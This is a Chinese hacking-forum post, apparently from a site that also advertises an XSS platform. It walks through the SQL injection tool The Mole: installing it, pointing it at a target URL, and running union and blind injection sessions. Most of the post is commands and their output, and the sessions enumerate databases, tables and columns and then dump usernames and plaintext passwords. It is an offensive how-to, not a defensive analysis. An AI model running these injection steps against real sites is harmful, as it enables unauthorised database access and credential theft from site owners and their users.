切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
300 Mode[复制链接]
发表于 2012-10-10 00:25:53 | 显示全部楼层 |!read_mode!
安装Mole
  1. $ sudo apt-get install python3 python3-lxml
  2. $ git clone git://git.code.sf.net/p/themole/code themole-code
复制代码

标准例子:
  1. # ./mole.py -u '注入地址' -n '关键字'
复制代码

关键字就是 and 1=1,and 1=2的区别
例如:
  1. # ./mole.py -u 'http://192.168.1.41/?id=1' -n 'admin'
复制代码

选项:columns
  1. #> columns test users
  2. +-------------------------+
  3. | Columns for table users |
  4. +-------------------------+
  5. | password                |
  6. | username                |
  7. +-------------------------+
复制代码

选项:cookie
  1. #> cookie test='test'
  2. #> cookie
  3. test='test'
复制代码

选项:dbinfo
  1. #> dbinfo
  2. User:      test@localhost
  3. Version:   5.1.58-1ubuntu1
  4. Database:  test
复制代码

选项:headers
  1. #> headers set User-Agent 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1'
  2. #> headers
  3. Host -> 192.168.1.41
  4. Accept-Language -> en-us
  5. Accept-Encoding -> identity
  6. Keep-Alive -> 300
  7. User-Agent -> 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1'
  8. Connection -> keep-alive
  9. Cache-Control -> max-age=0
复制代码

选项:模式
  1. #> mode union
  2. #> schemas
  3. [i] Trying injection using 0 parenthesis.
  4. [i] Trying separator: "'"
  5. [i] Trying separator: """
  6. [i] Trying separator: " "
  7. [+] Found separator: " "
  8. [i] Trying DBMS Mysql
  9. [+] Found DBMS: Mysql
  10. [i] Trying injection using 0 parenthesis.
  11. [i] Trying injection using comment: #
  12. [+] Found comment delimiter: "#"
  13. [+] Query columns count: 3
  14. [+] Trying finger 1/2
  15. [+] Injectable fields found: [1, 2, 3]
  16. [i] Trying to inject in field 1
  17. [+] Found injectable field: 1
  18. [+] Using string union technique.
  19. [+] Rows: 2
  20. [*] Dumped 2/2 rows.
  21. +--------------------+
  22. | Databases          |
  23. +--------------------+
  24. | information_schema |
  25. | test               |
  26. +--------------------+
  27. #> mode blind
  28. #> schemas
  29. [i] Trying injection using 0 parenthesis.
  30. [i] Trying separator: "'"
  31. [i] Trying separator: """
  32. [i] Trying separator: " "
  33. [+] Found separator: " "
  34. [i] Trying DBMS Mysql
  35. [+] Found DBMS: Mysql
  36. [+] Found row count: 2
  37. [+] Guessing length for the next 2 records.
  38. [+] Guessed length: 18
  39. information_schema
  40. [+] Guessed length: 4
  41. test
  42. +--------------------+
  43. | Databases          |
  44. +--------------------+
  45. | information_schema |
  46. | test               |
  47. +--------------------+
复制代码

选项 query
  1. #> query test users id,username,password
  2. [+] Rows: 3
  3. [*] Dumped 3/3 rows.
  4. +----------------------------+
  5. | id | username  | password  |
  6. +----------------------------+
  7. | 1  | admin     | P455w0rd  |
  8. | 2  | dupuis    | dupuis123 |
  9. | 3  | balantino | 20111206  |
  10. +----------------------------+
  11. #> output plain
  12. #> query test users id,username,password
  13. [+] Rows: 3
  14. [*] Dumped 3/3 rows.
  15. id, username, password:
  16. 1, admin, P455w0rd
  17. 2, dupuis, dupuis123
  18. 3, balantino, 20111206
复制代码

例子2
  1. #> query test users id,username,password
  2. [+] Rows: 3
  3. [*] Dumped 3/3 rows.
  4. +----------------------------+
  5. | id | username  | password  |
  6. +----------------------------+
  7. | 1  | admin     | P455w0rd  |
  8. | 2  | dupuis    | dupuis123 |
  9. | 3  | balantino | 20111206  |
  10. +----------------------------+
复制代码

选项tables
  1. #> tables test
  2. [+] Rows: 1
  3. [*] Dumped 1/1 rows.
  4. +--------+
  5. | Tables |
  6. +--------+
  7. | users  |
  8. +--------+
复制代码

正常顺序数据库操作
  1. #> schemas  #获得数据库
  2. +-----------+
  3. | Databases |
  4. +-----------+
  5. | pentest   |
  6. +-----------+
  7. #> tables pentest  #获得数据库PENTEST的表
  8. +--------+            
  9. | Tables |
  10. +--------+
  11. | stuff  |
  12. | users  |
  13. +--------+
  14. #> columns pentest users   #获得PENTEST的表USER的 columns
  15. [+] Found row count: 3         
  16. [+] Guessed length: 2                     
  17. id                  
  18. [+] Guessed length: 8
  19. username            
  20. [+] Guessed length: 8
  21. password            
  22. +-------------------------+
  23. | Columns for table users |
  24. +-------------------------+
  25. | id                      |
  26. | password                |
  27. | username                |
  28. +-------------------------+
  29. #> query pentest users password,username  查询内容
  30. [+] Found row count: 2     
  31. [+] Guessed length: 12                     
  32. admin~&admin         
  33. [+] Guessed length: 12
  34. guest~&guest         
  35. +---------------------+
  36. | password | username |
  37. +---------------------+
  38. | admin    | admin    |
  39. | guest    | guest    |
  40. +---------------------+
  41. #>
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 03:51

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部